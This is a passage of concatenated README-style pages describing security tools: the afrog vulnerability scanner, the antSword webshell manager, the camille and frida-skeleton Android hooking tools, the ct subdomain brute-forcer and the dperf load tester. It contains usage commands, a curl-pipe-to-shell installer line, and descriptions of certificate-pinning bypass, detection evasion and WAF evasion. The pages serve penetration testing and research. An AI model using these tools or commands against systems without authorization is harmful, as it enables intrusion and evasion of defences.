custom PoC directory, you can use the following command: 65 | 66 | ```sh 67 | afrog -t https://example.com -P mypocs/ 68 | ``` 69 | 70 | Use the command `-s keyword` to perform a fuzzy search on all PoCs and scan the search results. Multiple keywords can be used, separated by commas. For example: `-s weblogic,jboss`. 71 | 72 | ```sh 73 | afrog -t https://example.com -s weblogic,jboss 74 | ``` 75 | 76 | Use the command `-S keyword` to scan vulnerabilities based on their severity level. Severity levels include: `info`, `low`, `medium`, `high`, and `critical`. For example, to only scan high and critical vulnerabilities, use the command `-S high,critical`. 77 | 78 | ```sh 79 | afrog -t https://example.com -S high,critical 80 | ``` 81 | 82 | You can scan multiple URLs at the same time as well. 83 | 84 | ```sh 85 | afrog -T urls.txt 86 | ``` 87 | 88 | ## Configuration file 89 | 90 | The first time you start afrog, it will automatically create a configuration file called `afrog-config.yaml`, which will be saved in the current user directory under `$HOME/.config/afrog/afrog-config.yaml`. 91 | 92 | Here is an example config file: 93 | 94 | ```yaml 95 | reverse: 96 | ceye: 97 | api-key: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" 98 | domain: "xxxxxx.ceye.io" 99 | ``` 100 | 101 | `reverse` is a reverse connection platform used to verify command execution vulnerabilities that cannot be echoed back. Currently, only ceye can be used for verification. To obtain ceye, follow these steps: 102 | 103 | - Go to the [ceye.io](http://ceye.io/) website and register an account. 104 | - Log in and go to the personal settings page. 105 | - Copy the `domain` and `api-key` and correctly configure them in the `afrog-config.yaml` file. 106 | 107 | 108 | ## Json Output (For developers) 109 | 110 | ### Json 111 | Optional command: `-json` `-j`, Save the scan results to a JSON file. The JSON file includes the following contents by default: `target`, `fulltarget`, `id`, and `info`. The info field includes the following sub-fields: `name`, `author`, `severity`, `description`, and `reference`. If you want to save both `request` and `response` contents, please use the [-json-all](#jsonall) command parameter. 112 | 113 | ```sh 114 | afrog -t https://example.com -json result.json 115 | afrog -t https://example.com -j result.json 116 | ``` 117 | 118 | ::: warning 119 | The content of the JSON file is updated in real time. However, there is an important note to keep in mind: before the scan is completed, if developers want to parse the file content, they need to add a '`]`' symbol to the end of the file by themselves, otherwise it will cause parsing errors. Of course, if you wait for the scan to complete before parsing the file, this issue will not occur. 120 | ::: 121 | 122 | 123 | ### JsonAll 124 | 125 | Optional command: `-json-all` `-ja`, The only difference between the `-json-all` and `-json` commands is that `-json-all` writes all vulnerability results, including `request` and `response`, to a JSON file. 126 | 127 | ```sh 128 | afrog -t https://example.com -json-all result.json 129 | afrog -t https://example.com -ja result.json 130 | ``` 131 | 132 | 133 | ## Screenshot 134 | 135 | ![](https://github.com/zan8in/afrog/blob/main/images/1.png) 136 | 137 | 138 | ## 项目相关 139 | 140 | - 2023-07-10 发布视频[《404星链计划-afrog:快速稳定的漏洞扫描工具》](https://www.bilibili.com/video/BV1Pz4y177PU/) 141 | 142 | ## 最近更新 143 | 144 | #### [v3.1.7] - 2025-03-30 145 | 146 | **更新** 147 | - 修复HTTP响应解析异常问题,兼容更多服务器返回格式,程序运行更稳定! 148 | - Banner展示效果全面优化,界面颜值暴涨,交互体验更丝滑~ 149 | - 新增临时文件自动清理机制,afg文件每10秒智能更新,任务结束即自动清除,省心又安全! 150 | 151 | #### [v3.1.5] - 2025-01-01 152 | 153 | **更新** 154 | - 解决在 RAW HTTP 模式下,multipart 请求偶尔不成功的问题 155 | - 移除 PoC:hue-default-credential.yaml 156 | - 优化优化文件上传 PoC 写法 157 | - PoC 总数 1500 个 158 | 159 | #### [v3.1.3] - 2024-12-03 160 | 161 | **更新** 162 | - 修复 -mt 选项无法应用于 HTTP 请求的缺陷 163 | - 优化 http 默认请求超时为 50s 164 | 165 | #### [v3.1.2] - 2024-11-15 166 | 167 | **更新** 168 | - 优化PoC文件:smartbi-bypass-builtin-user-login.yaml 169 | - 新增资产自动去重功能 170 | - 优化资产存活性验证功能 171 | - 新增 PoC 10 个 172 | 173 | #### [v3.1.1] - 2024-08-09 174 | 175 | **更新** 176 | - HTML报告新增 Copy 按钮,一键复制Request请求包 177 | - 修复 afrog 工具中使用 -P 命令指定不存在的YAML文件时,会错误地扫描所有PoC文件的问题 178 | 179 | 180 | -------------------------------------------------------------------------------- /detail/antSword.md: -------------------------------------------------------------------------------- 1 | ## antSword 2 | 3 | ![Language](https://img.shields.io/badge/Language-Nodejs-blue) 4 | ![Author](https://img.shields.io/badge/Author-AntSwordProject-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/AntSwordProject/antSword.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V2.1.15-red) 7 | ![Time](https://img.shields.io/badge/Join-20201120-green) 8 | 9 | 10 | 11 | > 一剑在手,纵横无忧! 12 | 13 | **中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。** 14 | **任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担并将追究其相关责任!** 15 | 16 | [English][url-docen] / [文档][url-document] / [更新日志][url-changelog] 17 | 18 | ## 开发栈 19 | - [Electron][url-electron] 20 | - [ES6][url-es6] 21 | - [dhtmlx][url-dhtmlx] 22 | - [Nodejs][url-nodejs] 23 | * 以及其他在项目中调用到的库 24 | 25 | 中国蚁剑推崇模块化的开发思想,遵循**开源,就要开得漂亮**的原则,致力于为不同层次的人群提供最简单易懂、方便直接的代码展示及其修改说明,努力让大家可以一起为这个项目贡献出力所能及的点滴,让这款工具真正能让大家用得顺心、舒适,让它能为大家施展出最人性化最适合你的能力! 26 | 27 | ## 软件截图 28 | 29 | ![][url-mainui] 30 | 31 |
32 | 33 | 更多截图 34 | 35 | ![][url-filemanager] 36 | ![][url-terminal] 37 | ![][url-database] 38 | ![][url-pluginstore] 39 | 40 |
41 | 42 | ## 快速入门 43 | 44 | 参见文档 [快速入门][url-quickstart] 45 | 46 | ## 如何贡献 47 | 48 | 参见文档 [支持蚁剑][url-contribute] 49 | 50 | ## 致敬感谢 51 | > 中国蚁剑的核心代码模板均改自伟大的**中国菜刀**,在此向作者感谢以及致敬!致敬每一位为网络安全做出点滴贡献的新老前辈! 52 | 53 | **一路走来,得到了很多朋友的参与开发以及点滴赞助,在此感谢陪伴,感谢你们能让它越走越远!** 54 | 55 | [url-docen]: https://github.com/AntSwordProject/antSword/blob/master/README.md 56 | [url-changelog]: https://github.com/AntSwordProject/antSword/blob/master/CHANGELOG.md 57 | [url-document]: https://www.yuque.com/antswordproject/antsword/ 58 | [url-release]: https://github.com/AntSwordProject/AntSword/releases/ 59 | [url-electron]: http://electron.atom.io/ 60 | [url-es6]: http://es6.ruanyifeng.com/ 61 | [url-dhtmlx]: http://dhtmlx.com/ 62 | [url-nodejs]: https://nodejs.org/ 63 | [url-homepage]: http://uyu.us 64 | [url-release]: https://github.com/AntSwordProject/AntSword/releases 65 | [url-quickstart]: https://www.yuque.com/antswordproject/antsword/lmwppk 66 | [url-contribute]: https://doc.u0u.us/zh-hans/contribute_docs.html 67 | [url-mainui]: https://cdn.nlark.com/yuque/0/2021/png/1592179/1611820109032-b563426e-015c-4afe-a905-70e878fdcdb6.png 68 | [url-filemanager]: https://cdn.nlark.com/yuque/0/2021/png/1592179/1611823243564-26e964c2-6d38-421a-8543-5f1f082a6bbd.png 69 | [url-terminal]: https://cdn.nlark.com/yuque/0/2021/png/1592179/1611823538382-50fba630-3bd9-4205-b5dd-9cc054da79a8.png 70 | [url-database]: https://cdn.nlark.com/yuque/0/2021/png/1592179/1611825612518-ca1c4fcc-98a6-4fa3-b55d-f25619c86380.png 71 | [url-pluginstore]: https://cdn.nlark.com/yuque/0/2021/png/1592179/1611907520850-040bffb1-5bc3-4c1c-a8d1-1e69712f7684.png 72 | 73 | 74 | ## 项目相关 75 | 76 | - 2022-10-12 发布演示视频[404星链计划开源安全工具演示——antSword](https://www.bilibili.com/video/BV1Jg411h7Pj/) 77 | - 2022-07-18 发布文章[《AntSword v2.1.15 更新汇总》](https://mp.weixin.qq.com/s/QzbREMp8JaQiP9qo48OyHg) 78 | - 2021-11-15 发布文章[《蚁剑绕WAF进化图鉴》](https://mp.weixin.qq.com/s/EYP1ANj7pxM8_NX_7R9WjA) 79 | 80 | ## 最近更新 81 | 82 | #### [v2.1.15] - 2022-07-17 83 | 84 | **核心** 85 | - 修复 PHP/PHP4 当前目录不可写时 bypass open_basedir 失败的 Bug 86 | - 新增 PHPRAW/ASPXCSharp/PSWindows 类型 87 | 88 | **数据管理** 89 | - 修复 JSP/MySQL类型在表名中有特殊字符时执行异常的 Bug 90 | - 新增配置选项「Body 设置为 RAW 模式」 91 | 92 | **文件管理** 93 | - 新增 FileHash 计算目标文件 hash 功能 94 | 95 | **后端模块** 96 | - 支持自定义 Content-Type, 默认是 form 97 | - 支持 WebSocket 连接 98 | 99 | **设置模块** 100 | - 优化全局代理设置 101 | 102 | **其他** 103 | - 更多详细更新内容,见 release v2.1.15 104 | 105 | 106 | 107 | -------------------------------------------------------------------------------- /detail/camille.md: -------------------------------------------------------------------------------- 1 | ## camille 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-zhengjim-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/zhengjim/camille.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20230410-green) 8 | 9 | 10 | Android App隐私合规检测辅助工具 11 | 12 | ## 简介 13 | 14 | 现如今APP隐私合规十分重要,各监管部门不断开展APP专项治理工作及核查通报,不合规的APP通知整改或直接下架。camille可以hook住Android敏感接口,检测是否第三方SDK调用。根据隐私合规的场景,辅助检查是否符合隐私合规标准。 15 | 16 | ## 隐私合规资料及政策 17 | 18 | [隐私资料政策wiki](https://github.com/zhengjim/camille/wiki) 19 | 20 | ## 安装 21 | 22 | 环境: 23 | 24 | python3、frida 、一台已root手机(我测试机为Redmi 3s,刷机成魔趣Android 8.1,感觉问题挺多的),并在手机上运行`frida-server`。 25 | 26 | 测试了Android 8.1(还测试了魔趣Android 10),其他版本安卓可能会有bug。 27 | 28 | 更新日志: 29 | 30 | ``` 31 | 2023-03-14:新增敏感接口 32 | 33 | 2022-12-12:修复android 13有兼容性问题 34 | 35 | 2022-11-25:修复截图bug、优化hook方法支持传参数过滤 36 | 37 | 2022-11-21:新增可指定frida-server用于对抗frida检测,参数-H、修复模拟器没有sdcard目录报错问题 38 | 39 | 2022-11-16:感谢@ysrfeng 添加wiki,添加隐私合规相关资料和政策文档。 40 | 41 | 2022-11-15:合并@RebornQ PR,新增多设备可指定设备功能 42 | 43 | 2022-11-11:修复Android7报错、Frida12报错、优化异常处理便于排查 44 | 45 | 2022-11-10: 合并@RebornQ PR、修复部分问题、优化初始化异常提示 46 | 47 | 2022-11-03: 添加同意隐私合规状态(需人工确认)、第三方SDK识别、可hook构造函数,`methodName`传`'$init'`。方便大家交流,创建交流群。 新增文件接口,感谢@LiuXinzhi94提供。 新增敏感接口,感谢群里师傅@WYY提供 48 | 49 | 2022-10-26:新增支持加载外部脚本文件,填相对路径或绝对路径均可(用于 pyinstaller 打包二进制执行文件后使用)感谢@RebornQ pr 50 | 51 | 2022-09-07:添加讨论群,新增敏感接口,感谢群里师傅@410提供。 52 | 53 | 2022-07-08: 默认不开启绕过TracerPid,添加attach hook,避免有些加固包不能hook问题。 54 | 55 | 2022-06-22:修复程序异常退出、冗余度高、hook接口不全有遗落、新增多个Android版本接口;封装hook方法,新增用户自定义hook方法。 56 | 57 | 2022-01-14:删除hook短信接口。新增:可指定模块hook或不hook哪些模块。默认不传,全扫描。 58 | ``` 59 | 60 | 下载: 61 | 62 | ``` 63 | git clone https://github.com/zhengjim/camille.git 64 | cd camille 65 | pip install -r requirements.txt 66 | python camille.py -h 67 | ``` 68 | 69 | ![img.png](https://github.com/zhengjim/camille/raw/master/images/img.png) 70 | 71 | ## 用法 72 | 73 | [使用说明文档](https://github.com/zhengjim/camille/blob/master/docs/use.md) 74 | 75 | ## 后记 76 | 77 | 本来想使用uiautomator2或appium来模拟点击制定场景,~~但后续调研发现纯自动化的检测是不全的,最多也就检测20-30%,还是得结合人工来检测。索性就删除了模拟点击这块。~~(其实就是懒,不定期更新) 78 | 79 | ## 场景 80 | 81 | [百度史宾格的检测场景](https://github.com/zhengjim/camille/blob/master/docs/detection_scene.md) 82 | 83 | ## 参考链接 84 | 85 | - https://github.com/Dawnnnnnn/APPPrivacyDetect 86 | - https://github.com/r0ysue/r0capture/ 87 | - https://github.com/ChenJunsen/Hegui3.0 88 | 89 | 90 | ## 项目相关 91 | 92 | 93 | ## 最近更新 94 | 95 | 96 | -------------------------------------------------------------------------------- /detail/ct.md: -------------------------------------------------------------------------------- 1 | ## ct 2 | 3 | ![Language](https://img.shields.io/badge/Language-Rust-blue) 4 | ![Author](https://img.shields.io/badge/Author-rungobier@Knownsec404-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/ct.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.0.9-red) 7 | ![Time](https://img.shields.io/badge/Join-20211213-green) 8 | 9 | 10 | ct 是一款使用 rust 语言进行开发,并且基于 ZoomEye 域名查询以及利用域名字典进行子域名爆破的工具,同时在最终爆破完成后, 自动生成 Windows/*nix 下的可执行脚本。 脚本内容为自动将相应的的.gv 文件转化成为相应的 11 | .png 文件,graphviz 下载安装请参见 [graphviz](https://graphviz.org/download/) 12 | 支持在Windows/Linux/Mac上使用。 13 | 14 | ## 编译环境构建 15 | 16 | *nix 编译环境执行如下指令即可安装: 17 | 18 | ``` 19 | curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh 20 | ``` 21 | Windows 编译环境安装请下载[rustup-init.exe](https://static.rust-lang.org/rustup/dist/i686-pc-windows-gnu/rustup-init.exe)并执行。 22 | 23 | 24 | ## 使用 25 | 26 | 从[releases](https://github.com/knownsec/ct/releases "releases")下载二进制文件。 27 | 28 | ``` 29 | ct 1.0.9 30 | Autor: rungobier@knownsec 404 team 31 | Collect information tools about the target domain. 32 | 33 | USAGE: 34 | ct_win64.exe [FLAGS] [OPTIONS] [domain] 35 | 36 | FLAGS: 37 | -E Extended analysis domain 38 | -T Network upload speed test. 39 | -Z Do not use zoomeye data 40 | -C, --cidr Convert the IP related to the target domain name to cidr for extended search. Default is false. 41 | -h, --help Prints help information 42 | -i, --info Get ZoomEye account base info 43 | -q, --query-ip Use zoomeye to query ip information 44 | -V, --version Prints version information 45 | 46 | OPTIONS: 47 | --init Initialize the ZoomEye api key 48 | -s, --dns-dict DNS Server list in a textual file. 49 | file example... 50 | 8.8.8.8 51 | 1.1.1.1 52 | ... 53 | -d, --domain-dict Domain dict list in a file. 54 | file example.... 55 | www 56 | mail 57 | dev 58 | ... 59 | -F Extended filter domain list. 60 | Example of extended filtering domain name list: 61 | knownsec.com,jiasule.com,365cyd.com... 62 | --query-num Maximum number of zoomeye query. Default query number 100 63 | -t, --threads Maximum number of threads. Default number $CPU_NUM 64 | -w, --work-dir Directory to save the results of tasks. Default 65 | [/tmp|$DESKTOP]/YYYYmmddHHMM_$DOMAIN 66 | 67 | ARGS: 68 | Target domain name 69 | 70 | ``` 71 | 72 | ### 常用命令 73 | 74 | ``` 75 | ZoomEye apikey 初始化 76 | ct --init 62EC1239-xxxx-xxxxx-xxxx-e45291301ee 77 | 78 | 开启扩展搜索 79 | ct -E 80 | 81 | 过滤域名,域名之间以,分隔 82 | ct -F 83 | 84 | 查看ZoomEye账号信息 85 | ct -i 86 | 87 | 上行网络测速 (使用了speedtest库) 88 | ct -T 89 | 90 | 利用zoomeye的域名查询进行的懒人模式 默认每账号每天2万条查询结果 91 | ct baidu.com 92 | 93 | 使用域名字典爆破 94 | ct -d domain_dict.txt baidu.com 95 | 96 | 使用指定dns域名解析服务器及字典进行爆破(不使用ZoomEye数据加-Z,默认不加为合并) 字典路径需要带完整路径 97 | ct -Z -d domain_dict.txt -s dns.txt baidu.com 98 | ``` 99 | 100 | ## 域名以及IP关系图形生成 101 | 102 | *nix 103 | 104 | ```bash 105 | cd /tmp/202111301212_baidu.com 106 | chmod +x convert2png.sh 107 | ./convert2png.sh 108 | ls *.png 109 | ``` 110 | 111 | Windows 112 | 113 | ```bat 114 | cd C:\Users\rungobier\Desktop\202111301212_baidu.com 115 | convert2png.bat 116 | dir *.png 117 | ``` 118 | 119 | 最终生成的效果图如下: 120 | 121 | ![域名维度](https://github.com/knownsec/ct/raw/main/images/domain_graph.gv.svg) 122 | 123 | ## 编译 124 | 125 | ```bash 126 | git clone https://github.com/knownsec/ct 127 | cd ct 128 | cargo build --release 129 | ./target/release/ct 130 | ``` 131 | 132 | 133 | ## 项目相关 134 | 135 | 136 | ## 最近更新 137 | 138 | #### [v1.0.9] - 2022-07-18 139 | 140 | **更新** 141 | - 加入域名自动扩展搜索参数 -E- 加入无效域名过滤参数 -F, 同时自带过滤清单- 修改部分bug 142 | 143 | **Example** 144 | - `ct -E -F 365cyd.cn,jiashule.com,365cyd.com,knownsec.com baidu.com` 145 | 146 | #### [v1.0.5] - 2022-01-13 147 | 148 | **新增** 149 | - 加入查询IP开关参数 150 | 151 | **优化** 152 | - 调整网速测试的代码 153 | 154 | 155 | -------------------------------------------------------------------------------- /detail/dperf.md: -------------------------------------------------------------------------------- 1 | ## dperf 2 | 3 | ![Language](https://img.shields.io/badge/Language-C-blue) 4 | ![Author](https://img.shields.io/badge/Author-Benjamin-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/baidu/dperf.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.8.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20230410-green) 8 | 9 | 10 | dperf 是一个100Gbps的网络性能与压力测试软件。 11 | 12 | ## 优点 13 | - 性能强大: 14 | - 基于 DPDK,使用一台普通 x86 服务器就可以产生巨大的流量:千万级的 HTTP 每秒新建连接数,数百Gbps的带宽,几十亿的并发连接数 15 | - 统计信息详细: 16 | - 能够输出详细的统计信息,并且识别每一个丢包 17 | - 使用场景丰富: 18 | - 可用于对四层负载均衡等四层网关进行性能压力测试、长稳测试 19 | - 可用于对云上虚拟机的网络性能进行测试 20 | - 可用于对网卡性能、CPU的网络报文处理能力进行测试 21 | - 压测场景下,可作为高性能的HTTP Server或HTTP Client单独使用 22 | 23 | ## 性能 24 | ### HTTP每秒新建连接数 25 | |Client Cores|Server Cores|HTTP CPS| 26 | |------------|------------|--------| 27 | |1|1|2,101,044| 28 | |2|2|4,000,423| 29 | |4|4|7,010,743| 30 | |6|6|10,027,172| 31 | 32 | ### HTTP吞吐 33 | |Client Cores|Server Cores|RX(Gbps)|TX(Gbps)|Client CPU Usage(%)|Server CPU Usage(%)| 34 | |------------|------------|--------|--------|-------------------|-------------------| 35 | |1|1|18|18|60|59| 36 | |2|2|35|35|60|59| 37 | |4|4|46|46|43|43| 38 | 39 | ### HTTP并发连接数 40 | |Client Cores|Server Cores|Current Connections|Client CPU Usage(%)|Server CPU Usage(%)| 41 | |------------|------------|-------------------|-------------------|-------------------| 42 | |1|1|100,000,000|34|39| 43 | |2|2|200,000,000|36|39| 44 | |4|4|400,000,000|40|41| 45 | 46 | ### UDP TX PPS 47 | |Client Cores|TX MPPS|Client CPU Usage(%)| 48 | |------------|-------|-------------------| 49 | |1|15.96|95| 50 | |2|29.95|95| 51 | |4|34.92|67| 52 | |6|35.92|54| 53 | |8|37.12|22| 54 | 55 | 注意:本测试基于单张25Gbps Mellanox CX4 56 | 57 | ### 测试环境配置(客户端、服务器) 58 | dperf 的以上性能数据,基于下面的配置测试得到: 59 | 60 | - 内存: 512GB(大页 100GB) 61 | - 网卡: Mellanox MT27710 25Gbps * 2 62 | - 内核: 4.19.90 63 | 64 | ## 统计数据 65 | dperf 每秒输出多种统计数据: 66 | - TPS, CPS, 各种维度的PPS 67 | - TCP/Socket/HTTP级别的错误数 68 | - 丢包数 69 | - 按照TCP Flag分类的报文重传数 70 | 71 | ``` 72 | seconds 22 cpuUsage 52 73 | pktRx 3,001,058 pktTx 3,001,025 bitsRx 2,272,799,040 bitsTx 1,920,657,600 dropTx 0 74 | arpRx 0 arpTx 0 icmpRx 0 icmpTx 0 otherRx 0 badRx 0 75 | synRx 1,000,345 synTx 1,000,330 finRx 1,000,350 finTx 1,000,350 rstRx 0 rstTx 0 76 | synRt 0 finRt 0 ackRt 0 pushRt 0 tcpDrop 0 77 | skOpen 1,000,330 skClose 1,000,363 skCon 230 skErr 0 78 | httpGet 1,000,345 http2XX 1,000,350 httpErr 0 79 | ierrors 0 oerrors 0 imissed 0 80 | ``` 81 | 82 | ## 开始使用 83 | ### 设置大页 84 | #参考如下参数编辑 '/boot/grub2/grub.cfg',然后重启OS 85 | linux16 /vmlinuz-... nopku transparent_hugepage=never default_hugepagesz=1G hugepagesz=1G hugepages=8 86 | 87 | ### 编译DPDK 88 | #编辑'config/common_base'打开PMD开关 89 | #Mellanox CX4/CX5 requires 'CONFIG_RTE_LIBRTE_MLX5_PMD=y' 90 | #HNS3 requires 'CONFIG_RTE_LIBRTE_HNS3_PMD=y' 91 | #VMXNET3 requires 'CONFIG_RTE_LIBRTE_VMXNET3_PMD=y' 92 | 93 | TARGET=x86_64-native-linuxapp-gcc #or arm64-armv8a-linuxapp-gcc 94 | cd /root/dpdk/dpdk-stable-19.11.10 95 | make install T=$TARGET -j16 96 | 97 | ### 编译dperf 98 | cd dperf 99 | make -j8 RTE_SDK=/root/dpdk/dpdk-stable-19.11.10 RTE_TARGET=$TARGET 100 | 101 | ### 绑定网卡 102 | #Mellanox网卡跳过此步 103 | #假设PCI号是0000:1b:00.0 104 | 105 | modprobe uio 106 | modprobe uio_pci_generic 107 | /root/dpdk/dpdk-stable-19.11.10/usertools/dpdk-devbind.py -b uio_pci_generic 0000:1b:00.0 108 | 109 | ### 启动dperf server 110 | #dperf server监听6.6.241.27:80, 网关是6.6.241.1 111 | ./build/dperf -c test/http/server-cps.conf 112 | 113 | ### 从客户端发送请求 114 | #客户端IP必须要在配置文件的'client'范围内 115 | ping 6.6.241.27 116 | curl http://6.6.241.27/ 117 | 118 | ## 运行测试 119 | 下面的例子运行一个HTTP CPS压力测试。 120 | 121 | #在server端运行dperf 122 | ./build/dperf -c test/http/server-cps.conf 123 | 124 | #以另一台机器作为client端,运行dperf 125 | ./build/dperf -c test/http/client-cps.conf 126 | 127 | ## 文档 128 | 请访问[https://dperf.org/](https://dperf.org/). 129 | 130 | ## 限制 131 | - dperf 要求HTTP消息在一个数据包中,所以不适合7层负载均衡的测试。 132 | - dperf 要求独占使用网络接口。 133 | - dperf 没有路由功能。建议配合三层交换机搭建测试环境。 134 | 135 | ## 贡献 136 | dperf 欢迎大家贡献。详情请参阅[贡献指南](https://github.com/baidu/dperf/blob/main/CONTRIBUTING.md)。 137 | 138 | ## 专利 139 | - 彭建章(2024). 网络设备的测试方法及其装置. CN114205274B. 2024-06-11. 140 | 141 | ## 作者 142 | * [Jianzhang Peng](https://github.com/pengjianzhang), 中国科学技术大学计算机专业博士,曾在华为和百度担任主任工程师一职,参与了7层负载均衡与4层负载均衡系统的开发。在百度工作期间,他开发了dperf项目。即使从百度离职后,他仍然致力于维护dperf项目。目前,他在新加坡工作,专注于研究和实现加密货币的高频量化交易的低时延网络系统。 143 | 144 | ## 许可 145 | dperf基于 [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) 许可证。 146 | 147 | 148 | ## 项目相关 149 | 150 | 151 | ## 最近更新 152 | 153 | #### [v1.8.0] - 2024-12-12 154 | 155 | **新增** 156 | - 支持 DPDK-24.11 157 | - 新增 neigh_ignore 用于 LVS DR 模式 158 | - 新增随机 vxlan 源端口 159 | - 支持多进程 160 | - 新增 payload_file 以支持从文件设置 payload 161 | - 新增 vhost-net 支持 162 | - 更多服务器 ips 163 | 164 | **修改** 165 | - 自动调整默认 luanch_num 166 | - 简化 RSS 配置 167 | 168 | **修复** 169 | - 修复编译警告 170 | - 修复 rss 的准确并发连接数 171 | 172 | #### [v1.7.0] - 2024-06-06 173 | 174 | **新增** 175 | - 发送http post请求 176 | - dpdk pdump 177 | - fast_close:使用RST关闭连接 178 | - 支持DPDK-23.11和DPDK-24 179 | - 启用simd512 180 | - 禁用ack 181 | - 配置重发超时 182 | 183 | **更改** 184 | - 配置DPDK日志级别 185 | - clear_screen:dperf可以清除屏幕输出,让屏幕更干净 186 | - 静态链接 187 | 188 | **修复** 189 | - dpdk清理 190 | - CFLAGS覆盖 191 | - 拼写错误 192 | - 不要清除处于等待时间状态的序列 193 | 194 | #### [v1.6.0] - 2023-10-10 195 | 196 | **新增** 197 | - dperf 服务器可返回较大的 payload 198 | - 现在可使用 l3/l3l4 的网卡 RSS 分流算法 199 | 200 | **改动** 201 | - 最小本地端口范围可以设置为 1 202 | - 优化移除了 lport_range 之外的无用 socket 203 | - 将文档移至 dperf.org 204 | - 调整最大的 MTU 默认值 205 | 206 | **修复** 207 | - 修复 udp 连接数为负数的问题 208 | - 启动失败时将打印更多信息 209 | - 修复拼写错误和表达问题 210 | - 修复查找端口 id 时的错误 211 | - 修复创建新连接时长计算的错误 212 | - 仅当启用 http 时才能配置 http_host 或 http_path 213 | - 修复 dpdk-18.11 上构建错误的问题 214 | 215 | 216 | -------------------------------------------------------------------------------- /detail/frida-skeleton.md: -------------------------------------------------------------------------------- 1 | ## frida-skeleton 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-Margular-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/Margular/frida-skeleton.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V3.3-red) 7 | ![Time](https://img.shields.io/badge/Join-20201221-green) 8 | 9 | 10 | 11 | ### 简介 12 | 13 | `frida-skeleton`是基于frida的安卓hook框架,提供了很多frida自身不支持的功能,将hook安卓变成简单便捷,人人都会的事情,主要有: 14 | 15 | - 根据正则表达式批量hook安卓应用,支持多线程,可同时hook多个设备互不影响 16 | - 针对不同的应用可以同时加载不同的hook脚本,且支持优先级配置 17 | - 自动将手机上的所有TCP流量重定向到PC上的抓包工具如BurpSuite,无需手动配置,且自动绕过证书绑定机制 18 | - 丰富的日志记录功能,让你的hook历史永不丢失 19 | - 自动识别当前使用的frida版本并下载对应版本的frida-server到/data/local/tmp运行 20 | - 提供封装好的实用API以减少日常工作中的重复劳动 21 | 22 | ### 上手指南 23 | 24 | ###### 开发前的配置要求 25 | 26 | - Python3 27 | 28 | ###### 安装步骤 29 | 30 | 1. 克隆本项目到本地 31 | 32 | ```sh 33 | git clone https://github.com/Margular/frida-skeleton.git 34 | ``` 35 | 36 | 2. 安装第三方依赖库 37 | 38 | ```sh 39 | pip install -r requirements.txt 40 | ``` 41 | 42 | ###### 查看说明 43 | 44 | ```sh 45 | python frida-skeleton.py -h 46 | ``` 47 | 48 | 详细说明请移步[WIKI](https://github.com/Margular/frida-skeleton/wiki) 49 | 50 | ### 文件目录说明 51 | 52 | ``` 53 | 文件目录 54 | ├── CHANGELOG.md 项目改动记录 55 | ├── LICENSE 许可证 56 | ├── README.md 本文档 57 | ├── /assets/ 下载的frida-server存放的位置 58 | ├── frida-skeleton.py 项目入口 59 | ├── /images/ 本项目用到的图像资源文件 60 | ├── /lib/ Python库文件,frida-skeleton核心实现部分 61 | ├── /logs/ hook日志记录文件夹 62 | ├── /projects/ hook脚本存放的文件夹,以目录区分项目 63 | ├── requirements.txt 三方库需求列表 64 | ├── /scripts/ 封装好的实用API 65 | └── /tests/ 提供测试的安卓项目 66 | ``` 67 | 68 | ### 如何参与开源项目 69 | 70 | 贡献使开源社区成为一个学习、激励和创造的绝佳场所。你所作的任何贡献都是**非常感谢**的。 71 | 72 | 73 | 1. Fork本项目 74 | 2. 创建开发分支 (`git checkout -b dev`) 75 | 3. 提交更改 (`git commit -m 'Add something'`) 76 | 4. 推送到分支 (`git push origin dev`) 77 | 5. 提[Pull Request](https://github.com/Margular/frida-skeleton/compare) 78 | 79 | ### 版本控制 80 | 81 | 该项目使用Git进行版本管理。您可以在repository参看当前可用版本。 82 | 83 | ### 版权说明 84 | 85 | 该项目签署了MIT 授权许可,详情请参阅 [LICENSE](https://github.com/Margular/frida-skeleton/blob/master/LICENSE) 86 | 87 | 88 | ## 项目相关 89 | 90 | 91 | ## 最近更新 92 | 93 | #### [v3.3] - 2022-12-10 94 | 95 | **Add** 96 | - 新增--no-root选项,有的设备不支持adb root 97 | - frida-server使用随机端口绕过常规检测 98 | - 在初始化FridaThread时校验设备是否root 99 | 100 | **Changed** 101 | - 使用enumerate_applications替换enumerate_processes 102 | 103 | **Fixed** 104 | - 修复有的su不支持后面跟一个- 105 | - attrdict本地模块化以兼容3.10及以上版本 106 | 107 | #### [v3.2.3] - 2021-06-24 108 | 109 | **Add** 110 | - 保存hook脚本的整个内容方便调试和查看 111 | 112 | **Changed** 113 | - 在调用Trace.javaClassByRegex的时候默认跳过hook系统函数 114 | 115 | **Fixed** 116 | - 修复可能无法退出程序的BUG 117 | 118 | #### [v3.2.0] - 2020-12-24 119 | 120 | **Add** 121 | - 新增Jav.describeObject API,很方便地打印java对象的函数和字段信息 122 | - 加入星链计划2.0 123 | - 添加logo 124 | 125 | **Changed** 126 | - 迁移wiki到github 127 | - 主程序帮助界面改为中文 128 | 129 | 130 | -------------------------------------------------------------------------------- /detail/fscan.md: -------------------------------------------------------------------------------- 1 | ## fscan 2 | 3 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 4 | ![Author](https://img.shields.io/badge/Author-shadow1ng-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/shadow1ng/fscan.svg?style=flat&logo=github) 6 | 